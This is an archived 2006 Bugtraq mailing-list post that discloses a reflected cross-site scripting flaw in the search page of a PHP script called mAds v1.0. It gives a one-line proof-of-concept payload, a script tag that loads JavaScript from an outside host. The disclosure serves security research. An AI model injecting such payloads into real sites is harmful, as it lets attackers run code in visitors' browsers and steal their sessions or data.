| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060630231101.12528.qmail@securityfocus.com> Date: 30 Jun 2006 23:11:01 -0000 From: lunY@...fucktard.com To: bugtraq@...urityfocus.com Subject: mAds v1.0 mAds v1.0 Homepage: http://lowpricescripts.com/product_info.php?products_id=51 Affected files: *Searching ----------------------------------- XSS vuln when searching: Like the hotbot XSS vuln, when searching mAds returns with its results they are generated dynamically on screen, with no filtering at all. For a PoC as your search string put in: <script src=http://www.youfucktard.com/xss.js></script> Screenshots: http://www.youfucktard.com/xsp/mads1.jpg Im sure other vulnerabilities aside from XSS could be also possible due to this. ------------------------------------
Powered by blists - more mailing lists